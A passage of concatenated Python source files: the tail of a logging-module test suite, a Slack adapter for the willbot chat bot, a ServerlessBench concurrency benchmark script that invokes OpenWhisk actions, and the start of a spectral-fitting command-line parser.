def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class HandlerTest(BaseTest):
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
try:
h.close()
except ValueError:
pass
if os.path.exists(fn):
os.unlink(fn)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest, HandlerTest)
if __name__ == "__main__":
test_main()
|
slack.py | """Slack adapter for willbot
"""
# pylint: disable=no-member
import json
import logging
import random
import sys
import time
import traceback
import urllib
from multiprocessing import Process
from threading import Thread
from typing import Dict, Optional
import slack_sdk
from markdownify import MarkdownConverter
from slack_sdk.rtm import RTMClient
from will import settings
from will.abstractions import Channel, Event, Message, Person
from will.mixins import SleepMixin, StorageMixin
from will.utils import UNSURE_REPLIES, clean_for_pickling
from .base import IOBackend
# https://api.slack.com/docs/rate-limits says the actual max is 16k, but that includes the entire POST content, and
# warns about multibyte characters. Turns out the API will disconnect you if there are more than 4031 characters
# in the message. Documentation is hard.
MAX_MESSAGE_SIZE = 4031
class SlackMarkdownConverter(MarkdownConverter):
"Extended Markdown converter"
def convert_strong(self, _, text): # pylint: disable=no-self-use
"Normal markup is incorrect for Slack"
return "*%s*" % text if text else ""
def convert_a(self, el, text):
"dress up <a> links for Slack"
href = el.get("href")
title = el.get("title")
if self.options["autolinks"] and text == href and not title:
# Shortcut syntax
return "<%s>" % href
title_part = ' "%s"' % title.replace('"', r"\"") if title else ""
return "<%s%s|%s>" % (href, title_part, text or "") if href else text or ""
class SlackBackend(
IOBackend, SleepMixin, StorageMixin
): # pylint: disable=too-many-instance-attributes
"Adapter that lets Will talk to Slack"
friendly_name = "Slack"
internal_name = "will.backends.io_adapters.slack"
required_settings = [
{
"name": "SLACK_API_TOKEN",
"obtain_at": "1. Go to https://api.slack.com/apps?new_classic_app=1"
" and Configure your app.\n"
'2. Install app in your workspace.\n'
"3. Set Bot User OAuth Token (beginning with xoxb) as SLACK_API_TOKEN.",
}
]
PAGE_LIMIT = 1000
_channels: Dict[str, Channel] = dict()
_people: Dict[str, Person] = dict()
_default_channel = None
rtm_thread: Optional[RTMClient] = None
complained_about_default = False
complained_uninvited = False
_client = None
me = None
handle = None
def get_channel_from_name(self, name):
"Decodes human-readable name into the Slack channel name"
for c in self.channels.values():
if c.name.lower() == name.lower() or c.id.lower() == name.lower():
return c
# We need to check if a user id was passed as a channel
# and get the correct IM channel if it was.
elif name.startswith('U') or name.startswith('W'):
return self.open_direct_message(name)
webclient = self.client._web_client # pylint: disable=protected-access
try:
channel_info = webclient.conversations_info(channel=name)["channel"]
except slack_sdk.errors.SlackApiError:
logging.warning('Error looking up Slack channel %s', name)
return None
channel_members = webclient.conversations_members(channel=name)
now = time.time()
members = {
x: self.people[x]
for x in channel_members.get("members", list())
if x in self.people
}
logging.debug("took %0.2f seconds to scan people data", time.time() - now)
return Channel(
name=channel_info.get("name", name),
id=channel_info["id"],
members=members,
source=name,
is_channel=False,
is_group=False,
is_im=channel_info["is_im"],
is_private=True,
)
def get_channel_name_from_id(self, name):
for k, c in self.channels.items():
if c.name.lower() == name.lower() or c.id.lower() == name.lower():
return c.name
def normalize_incoming_event(self, event):
"Makes a Slack event look like all the other events we handle"
event_type = event.get("type")
event_subtype = event.get("subtype")
logging.debug("event type: %s, subtype: %s", event_type, event_subtype)
if (
(
event_subtype is None
and event_type not in ["message_changed", "message.incoming"]
)
# Ignore thread summary events (for now.)
and (
event_subtype is None
or ("message" in event and "thread_ts" not in event["message"])
)
):
# print("slack: normalize_incoming_event - %s" % event)
# Sample of group message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495661121.838366', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'C5JDAR2S3'}
# Sample of 1-1 message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495662397.335424', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'D5HGP0YE7'}
# Threaded message
# {u'event_ts': u'1507601477.000073', u'ts': u'1507601477.000073',
# u'subtype': u'message_replied', u'message':
# {u'thread_ts': u'1507414046.000010', u'text': u'hello!',
# u'ts': u'1507414046.000010', u'unread_count': 2,
# u'reply_count': 2, u'user': u'U5GUL9D9N', u'replies':
# [{u'user': u'U5ACF70RH', u'ts': u'1507601449.000007'}, {
# u'user': u'U5ACF70RH', u'ts': u'1507601477.000063'}],
# u'type': u'message', u'bot_id': u'B5HL9ABFE'},
# u'type': u'message', u'hidden': True, u'channel': u'D5HGP0YE7'}
logging.debug("we like that event!")
if event_subtype == "bot_message":
sender = Person(
id=event["bot_id"],
mention_handle="<@%s>" % event["bot_id"],
handle=event["username"],
source=event,
name=event["username"],
)
else:
sender = self.people[event["user"]]
try:
channel = self.get_channel_from_name(event["channel"])
except KeyError:
self._update_channels()
channel = self.get_channel_from_name(event["channel"])
is_private_chat = getattr(channel, "is_private", False)
is_direct = getattr(getattr(channel, "source", None), 'is_im', False)
channel = clean_for_pickling(channel)
# print "channel: %s" % channel
interpolated_handle = "<@%s>" % self.me.id
real_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
thread = None
if "thread_ts" in event:
thread = event["thread_ts"]
if interpolated_handle in event["text"] or real_handle in event["text"]:
will_is_mentioned = True
if event["text"].startswith(interpolated_handle):
event["text"] = event["text"][len(interpolated_handle):]
if event["text"].startswith(real_handle):
event["text"] = event["text"][len(real_handle):]
# sometimes autocomplete adds a : to the usename, but it's certainly extraneous.
if will_is_mentioned and event["text"][0] == ":":
event["text"] = event["text"][1:]
if event.get("user") == self.me.id:
will_said_it = True
m = Message(
content=event["text"].strip(),
type=event_type,
is_direct=is_direct or will_is_mentioned,
is_private_chat=is_private_chat,
is_group_chat=not (is_private_chat or is_direct),
backend=self.internal_name,
sender=sender,
channel=channel,
thread=thread,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
return m
# An event type the slack ba has no idea how to handle.
return None
def set_topic(self, event):
"""Sets the channel topic. This doesn't actually work anymore since Slack has removed that ability from bots.
Leaving the code here in case they re-enable it."""
data = self.set_data_channel_and_thread(event)
self.client._web_client.api_call( # pylint: disable=protected-access
"conversations.setTopic",
topic=event.content,
channel=data["channel"],
)
def send_file(self, event):
'Sometimes you need to upload an image or file'
try:
logging.info('EVENT: %s', str(event))
data = {}
if hasattr(event, "kwargs"):
data.update(event.kwargs)
data.update({
'filename': event.filename,
'filetype': event.filetype
})
self.set_data_channel_and_thread(event, data)
# This is just *silly*
if 'thread_ts' in data:
del data['thread_ts']
data['channels'] = data['channel']
del data['channel']
logging.debug('calling files_uploads with: %s', data)
result = self.client._web_client.api_call( # pylint: disable=protected-access
'files.upload', files={'file': event.file}, params=data)
logging.debug('send_file result: %s', result)
except Exception:
logging.exception("Error in send_file handling %s", event)
def handle_outgoing_event(self, event, retry=5):
"Process an outgoing event"
try:
if event.type in ["say", "reply"]:
if "kwargs" in event and "html" in event.kwargs and event.kwargs["html"]:
event.content = SlackMarkdownConverter().convert(event.content)
event.content = event.content.replace("&", "&")
event.content = event.content.replace(r"\_", "_")
kwargs = {}
if "kwargs" in event:
kwargs.update(**event.kwargs)
if kwargs.get('update', None) is not None:
self.update_message(event)
elif (
hasattr(event, "source_message")
and event.source_message
and "channel" not in kwargs
):
self.send_message(event)
else:
# Came from webhook/etc
target_channel = kwargs.get("room", kwargs.get("channel", None))
if target_channel:
event.channel = self.get_channel_from_name(target_channel)
if event.channel:
self.send_message(event)
else:
logging.error(
"I was asked to post to the slack %s channel, but it doesn't exist.",
target_channel,
)
if self.default_channel:
event.channel = self.get_channel_from_name(
self.default_channel
)
event.content = (
event.content + " (for #%s)" % target_channel
)
self.send_message(event)
elif self.default_channel:
event.channel = self.get_channel_from_name(self.default_channel)
self.send_message(event)
else:
logging.critical(
"I was asked to post to a slack default channel, but I'm nowhere."
"Please invite me somewhere with '/invite @%s'",
self.me.handle,
)
elif event.type in [
"topic_change",
]:
self.set_topic(event)
elif event.type in [
"file.upload",
]:
self.send_file(event)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
event.content = random.choice(UNSURE_REPLIES)
self.send_message(event)
except (urllib.error.URLError, Exception): # websocket got closed, no idea
if retry < 1:
sys.exit()
del self._client
time.sleep(5) # pause 5 seconds just because
self.client
self.handle_outgoing_event(event, retry=retry-1)
@staticmethod
def set_data_channel_and_thread(event, data=None):
"Update data with the channel/thread information from event"
if event.type == "file.upload":
# We already know what to do when it's a file DM
if event.kwargs.get("is_direct") is True:
return
if data is None:
data = dict()
if "channel" in event:
# We're coming off an explicit set.
channel_id = event.channel.id
else:
if "source_message" in event:
# Mentions that come back via self.say()
if hasattr(event.source_message, "data"):
channel_id = event.source_message.data.channel.id
if hasattr(event.source_message.data, "thread"):
data.update({"thread_ts": event.source_message.data.thread})
else:
# Mentions that come back via self.say() with a specific room (I think)
channel_id = event.source_message.channel.id
if hasattr(event.source_message, "thread"):
data.update({"thread_ts": event.source_message.thread})
else:
# Mentions that come back via self.reply()
if hasattr(event.data, "original_incoming_event"):
if hasattr(event.data.original_incoming_event.channel, "id"):
channel_id = event.data.original_incoming_event.channel.id
else:
channel_id = event.data.original_incoming_event.channel
else:
if hasattr(
event.data["original_incoming_event"].data.channel, "id"
):
channel_id = event.data[
"original_incoming_event"
].data.channel.id
else:
channel_id = event.data["original_incoming_event"].data.channel
try:
# If we're starting a thread
if (
"kwargs" in event
and event.kwargs.get("start_thread", False)
and ("thread_ts" not in data or not data["thread_ts"])
):
if hasattr(event.source_message, "original_incoming_event"):
data.update(
{
"thread_ts": event.source_message.original_incoming_event["ts"]
}
)
elif (
hasattr(event.source_message, "data")
and hasattr(
event.source_message.data, "original_incoming_event"
)
and "ts" in event.source_message.data.original_incoming_event
):
logging.error(
"Hm. I was told to start a new thread, but while using .say(), instead of .reply().\n"
"This doesn't really make sense, but I'm going to make the best of it by pretending you "
"used .say() and threading off of your message.\n"
"Please update your plugin to use .reply() when you have a second!"
)
data.update(
{
"thread_ts": event.source_message.data.original_incoming_event[
"ts"
]
}
)
else:
if hasattr(event.data.original_incoming_event, "thread_ts"):
data.update(
{"thread_ts": event.data.original_incoming_event.thread_ts}
)
elif "thread" in event.data.original_incoming_event.data:
data.update(
{
"thread_ts": event.data.original_incoming_event.data.thread
}
)
except Exception:
logging.info(traceback.format_exc().split(" ")[-1])
data.update(
{
"channel": channel_id,
}
)
return data
def get_event_data(self, event):
"Send a Slack message"
data = {}
if hasattr(event, "kwargs"):
data.update(event.kwargs)
# Add slack-specific functionality
if "color" in event.kwargs:
data.update(
{
"attachments": json.dumps(
[
{
"fallback": event.content,
"color": self._map_color(event.kwargs["color"]),
"text": event.content,
}
]
),
}
)
elif "attachments" in event.kwargs:
data.update(
{
"text": event.content,
"attachments": json.dumps(event.kwargs["attachments"]),
}
)
else:
data.update(
{
"text": event.content,
}
)
else:
data.update(
{
"text": event.content,
}
)
data = self.set_data_channel_and_thread(event, data=data)
# Auto-link mention names
if "text" in data:
if data["text"].find("<@") != -1:
data["text"] = data["text"].replace("<@", "<@")
data["text"] = data["text"].replace(">", ">")
if len(data['text']) > MAX_MESSAGE_SIZE:
new_event = Event(
type='file.upload',
# Removes "code" markers from around the item and then makes it bytes
file=data['text'].strip('```').encode('utf-8'),
filename=getattr(event, 'filename', getattr(event, 'title', 'response')),
filetype=getattr(event, 'filetype', 'text'),
source_message=event.source_message,
kwargs=event.kwargs,
)
try:
self.send_file(new_event)
except Exception:
logging.exception('Error sending file')
return None
elif "attachments" in data and "text" in data["attachments"][0]:
if data["attachments"][0]["text"].find("<@") != -1:
data["attachments"][0]["text"] = data["attachments"][0]["text"].replace(
"<@", "<@"
)
data["attachments"][0]["text"] = data["attachments"][0]["text"].replace(
">", ">"
)
data.update(
{
"token": settings.SLACK_API_TOKEN,
"as_user": True,
}
)
if hasattr(event, "kwargs") and "html" in event.kwargs and event.kwargs["html"]:
data.update(
{
"parse": "none",
}
)
return data
def send_message(self, event):
"Send a Slack message"
if event.content == "" or event.content is None:
# slack errors with no_text if empty message
return
data = self.get_event_data(event)
if data is None:
return
self.client._web_client.api_call( # pylint: disable=protected-access
"chat.postMessage", data=data
)
def open_direct_message(self, user_id):
"""Opens a DM channel."""
return self.client._web_client.api_call( # pylint: disable=protected-access
"conversations.open",
users=[user_id]
)['channel']['id']
def update_message(self, event):
"Update a Slack message"
if event.content == "" or event.content is None:
# slack errors with no_text if empty message
return
data = self.get_event_data(event)
if data is None:
return
redis_key = f'slack_update_cache_{data["update"]}'
if not hasattr(self, 'storage'):
self.bootstrap_storage()
timestamp = self.storage.redis.get(redis_key)
if not timestamp:
result = self.client._web_client.api_call( # pylint: disable=protected-access
"chat.postMessage", data=data
)
if result.get('ts', None):
self.storage.redis.set(redis_key, result['ts'], ex=3600)
else:
logging.error('Failure sending %s: %s', event, result.get('error', 'Unknown error'))
else:
data['ts'] = timestamp
result = self.client._web_client.api_call( # pylint: disable=protected-access
"chat.update", data=data
)
if result.get('ok', False) is False:
logging.error('Failure updating %s: %s', event, result.get('error', 'Unknown error'))
@staticmethod
def _map_color(color):
"Turn colors into hex values, handling old slack colors, etc"
if color == "red":
return "danger"
if color == "yellow":
return "warning"
if color == "green":
return "good"
return color
def join_channel(self, channel_id):
"Join a channel"
return self.client._web_client.api_call( # pylint: disable=protected-access
"channels.join",
channel=channel_id,
)
@property
def people(self):
"References/initializes our internal people cache"
if not self._people:
self._update_people()
return self._people
@property
def default_channel(self):
"References/initializes our default channel"
if not self._default_channel:
self._decide_default_channel()
return self._default_channel
@property
def channels(self):
"References/initializes our internal channel cache"
if not self._channels:
self._update_channels()
return self._channels
@property
def client(self):
"References/initializes our RTM client"
if self._client is None:
self._client = RTMClient(
token=settings.SLACK_API_TOKEN, run_async=False, auto_reconnect=True
)
return self._client
def _decide_default_channel(self):
"Selects a default channel"
self._default_channel = None
self.people # Set self.me # pylint: disable=pointless-statement
if hasattr(settings, "SLACK_DEFAULT_CHANNEL"):
channel = self.get_channel_from_name(settings.SLACK_DEFAULT_CHANNEL)
if channel:
if self.me.id in channel.members:
self._default_channel = channel.id
return
elif not self.complained_about_default:
self.complained_about_default = True
logging.error(
"The defined default channel(%s) does not exist!",
settings.SLACK_DEFAULT_CHANNEL,
)
for c in self.channels.values():
if c.name != c.id and self.me.id in c.members:
self._default_channel = c.id
if not self._default_channel and not self.complained_uninvited:
self.complained_uninvited = True
logging.critical("No channels with me invited! No messages will be sent!")
def _update_channels(self, client=None):
"Updates our internal list of channels. Kind of expensive."
channels = {}
if client:
for page in client.conversations_list(
limit=self.PAGE_LIMIT,
exclude_archived=True,
types="public_channel,private_channel,mpim,im",
):
for channel in page["channels"]:
members = {}
for m in channel.get("members", list()):
if m in self.people:
members[m] = self.people[m]
channels[channel["id"]] = Channel(
id=channel["id"],
name=channel.get("name", channel["id"]),
source=clean_for_pickling(channel),
members=members,
)
if len(channels.keys()) == 0:
# Server isn't set up yet, and we're likely in a processing thread,
if self.load("slack_channel_cache", None):
self._channels = self.load("slack_channel_cache", None)
else:
self._channels = channels
self.save("slack_channel_cache", channels)
def _update_people(self, client=None):
"Updates our internal list of Slack users. Kind of expensive."
people = {}
if client:
for page in client.users_list(limit=self.PAGE_LIMIT):
for member in page["members"]:
if member["deleted"]:
continue
member_id = member["id"]
user_timezone = member.get("tz")
people[member_id] = Person(
id=member_id,
mention_handle=member.get("mention_handle", ""),
handle=member["name"],
source=clean_for_pickling(member),
name=member.get("real_name", ""),
)
if member["name"] == self.handle:
self.me = people[member_id]
if user_timezone and user_timezone != "unknown":
people[member_id].timezone = user_timezone
if len(people.keys()) == 0:
# Server isn't set up yet, and we're likely in a processing thread,
if self.load("slack_people_cache", None):
self._people = self.load("slack_people_cache", None)
if self.me is None:
self.me = self.load("slack_me_cache", None)
if self.handle is None:
self.handle = self.load("slack_handle_cache", None)
else:
self._people = people
self.save("slack_people_cache", people)
self.save("slack_me_cache", self.me)
self.save("slack_handle_cache", self.handle)
def _update_backend_metadata(self, **event):
"Updates all our internal caches. Very expenseive"
logging.debug("updating backend on event: %s", event)
name = event.get("data", dict()).get("self", dict()).get("name")
if name is not None:
self.__class__.handle = name
Thread(
target=self._update_people, args=(event["web_client"],), daemon=True
).start()
Thread(
target=self._update_channels, args=(event["web_client"],), daemon=True
).start()
def _watch_slack_rtm(self):
"This is our main loop."
# The decorators don't work on unbound methods. Sigh.
# These are all events that should spark an update of our inventory
RTMClient.run_on(event="open")(self._update_backend_metadata)
RTMClient.run_on(event="channel_added")(self._update_backend_metadata)
RTMClient.run_on(event="user_changed")(self._update_backend_metadata)
# This just handles messages
RTMClient.run_on(event="message")(self.handle_incoming_slack_event)
self.client.start()
def handle_incoming_slack_event(self, **kwargs):
"Event handler"
logging.debug("Handling incoming event: %s", kwargs)
self.handle_incoming_event(kwargs["data"])
def bootstrap(self):
"This is Wills Process entry point for connecting to a backend"
# Bootstrap must provide a way to to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.rtm_thread = Process(target=self._watch_slack_rtm, daemon=False)
self.rtm_thread.start()
def terminate(self):
"Exit gracefully"
if self.rtm_thread is not None:
self.rtm_thread.terminate()
while self.rtm_thread.is_alive():
time.sleep(0.2)
|
run.py |
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "arraySum_chained"
actionName = "arraySum_sequence"
params = "--param n 0"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
while count < 2:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main() |
spectral.py | import cluster
import argparse
import multiprocessing as mp
import numpy as np
import time
import pypeline_io as io
def get_arguments():
help_str = """
pypeline help string
"""
prog = 'pypeline'
max_cpu = mp.cpu_count()
# logger.debug("Getting commandline arguments.")
parser = argparse.ArgumentParser(description=help_str, prog=prog)
parser.add_argument("--cluster_config_file", "-c", dest="cluster_config",
action="store",default=None,
help="Points to the cluster config file")
parser.add_argument("--parallel", "-p", dest="parallel",
action="store_true", default=False,
help='Run in parallel (default False)')
parser.add_argument("--num_cpus", "-n", dest="num_cpus",
action="store", default=max_cpu, type=int,
help="Number of CPUs to use in the fitting process. "
"Default is max number of cpus available ({} for "
"this system.)".format(max_cpu))
parser.add_argument("--continue", dest='cont',
action='store_true', default=False,
help='Continue an unfinished run')
parser.add_argument("--resolution", "-r", dest='resolution',
action='store', default=2, type=int,
help='Generate a low, medium, or high resolution temperature map. Low = 1, Med = 2, High = 3. '
